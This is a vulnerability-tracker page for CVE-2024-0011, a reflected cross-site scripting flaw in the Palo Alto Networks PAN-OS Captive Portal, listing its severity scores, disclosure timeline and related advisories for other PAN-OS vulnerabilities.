CVE-2024-0011

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

Published: Feb 14, 2024 / Updated: 9mo ago

010
CVSS 4.3EPSS 0.04%Medium
CVE info copied to clipboard

A reflected cross-site scripting (XSS) vulnerability in the Captive Portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of an authenticated Captive Portal user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft.

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Timeline

CVE Assignment

NVD published the first details for CVE-2024-0011

Feb 14, 2024 at 10:15 AM
First Article

Feedly found the first article mentioning CVE-2024-0011. See article

Feb 14, 2024 at 6:21 PM / National Vulnerability Database
Detection in Vulnerability Scanners

Detection for the vulnerability has been added to Nessus (190585)

Feb 15, 2024 at 2:15 PM
EPSS

EPSS Score was set to: 0.04% (Percentile: 6.7%)

Feb 15, 2024 at 2:33 PM
Static CVE Timeline Graph

Affected Systems

Paloaltonetworks/pan-os
+null more

Attack Patterns

CAPEC-209: XSS Using MIME Type Mismatch
+null more

News

[no-title]
10 N CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect none none none none All >= 11.1.2-h3 (See additional hotfixes in Solution section) >= 11.0.4-h1 (See additional hotfixes in Solution section) >= 10.2.9-h1 (See additional hotfixes in Solution section) All All all 2024-04-12 2024-04-15 8.3 N CVE-2024-3383 PAN-OS: Improper Group Membership Change Vulnerability in Cloud Identity Engine (CIE) none none none none All All >= 11.0.3 >= 10.2.5 >= 10.1.11 All all 2024-04-10 2024-04-10 8.2 N CVE-2024-3385 PAN-OS: Firewall Denial of Service (DoS) when GTP Security is Disabled Cloud NGFW PAN-OS 11.1 PAN-OS 11.0 PAN-OS 10.2 PAN-OS 10.1 PAN-OS 9.1 PAN-OS 9.0 Prisma Access none none none All All >= 11.0.3 >= 10.2.8 >= 10.1.12 >= 9.1.17 >= 9.0.17-h4 All 2024-04-10 2024-04-10 8.2 CVE-2024-3382 PAN-OS: Firewall Denial of Service (DoS) via a Burst of Crafted Packets none none none none All >= 11.1.2 >= 11.0.4 >= 10.2.7-h3 All All all 2024-04-10 2024-04-10 8.2 N CVE-2024-3384 PAN-OS: Firewall Denial of Service (DoS) via Malformed NTLM Packets none none none none All All All >= 10.0.12 >= 9.1.15-h1 >= 9.0.17 >= 8.1.24 all 2024-04-10 2024-04-10 6.9 N CVE-2024-3386 PAN-OS: Predefined Decryption Exclusions Does Not Work as Intended Cloud NGFW PAN-OS 11.1 PAN-OS 11.0 PAN-OS 10.2 PAN-OS 10.1 PAN-OS 10.0 PAN-OS 9.1 PAN-OS 9.0 Prisma Access none none none All All >= 11.0.1-h2, >= 11.0.2 >= 10.2.4-h2, >= 10.2.5 >= 10.1.9-h3, >= 10.1.10 >= 10.0.13 >= 9.1.17 >= 9.0.17-h2 All 2024-04-10 2024-04-10 6 CVE-2024-3387 PAN-OS: Weak Certificate Strength in Panorama Software Leads to Sensitive Information Disclosure none none none none All All >= 11.0.4 on Panorama >= 10.2.7-h3 on Panorama, >= 10.2.8 on Panorama >= 10.1.12 on Panorama All all 2024-04-10 2024-04-10 5.1 CVE-2024-3388 PAN-OS: User Impersonation in GlobalProtect SSL VPN Cloud NGFW PAN-OS 11.1 PAN-OS 11.0 PAN-OS 10.2 PAN-OS 10.1 PAN-OS 9.1 PAN-OS 9.0 PAN-OS 8.1 Prisma Access none none All All >= 11.0.3 >= 10.2.7-h3 >= 10.1.11-h4 >= 9.1.17 >= 9.0.17-h4 >= 8.1.26 >= 10.2.4 2024-04-10 2024-04-10 i PAN-SA-2024-0004 Informational Bulletin: OSS CVEs fixed in PAN-OS Versions prior to those listed above 2024-04-10 i PAN-SA-2024-0003 Informational Bulletin:
Rewterz Threat Advisory – Multiple Palo Alto Networks PAN-OS Vulnerabilities
Palo Alto Networks PAN-OS is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the GlobalProtect portal feature. Palo Alto Networks PAN-OS is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the web interface on Panorama appliances.
PAN-OS: CVSS (Max): 5.1
The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin.
PAN-OS: CVSS (Max): 5.1
=========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2024.1179 CVE-2024-0011 PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in Captive Portal Authentication 26 February 2024 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: PAN-OS Publisher: Palo Alto Networks Operating System: Network Appliance Resolution: Patch/Upgrade CVE Names: CVE-2024-0011 Original Bulletin: https://securityadvisories.paloaltonetworks.com/CVE-2024-0011 Comment: CVSS (Max): 5.1 CVE-2024-0011 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/AU:N/R:A/V:D/RE:L/U:Amber) CVSS Source:
Palo Alto Networks PAN-OS cross-site scripting CVE-2024-0011 - https://www. redpacketsecurity.com/palo-alt o-networks-pan-os-cross-site-scripting-cve-2024-0011/ # CVE # Vulnerability # OSINT # ThreatIntel # Cyber
See 11 more articles and social media posts

CVSS V3.1

Attack Vector:Network
Attack Complexity:Low
Privileges Required:None
User Interaction:Required
Scope:Unchanged
Confidentiality:None
Integrity:Low
Availability Impact:None

Categories

Be the first to know about critical vulnerabilities

Collect, analyze, and share vulnerability reports faster using AI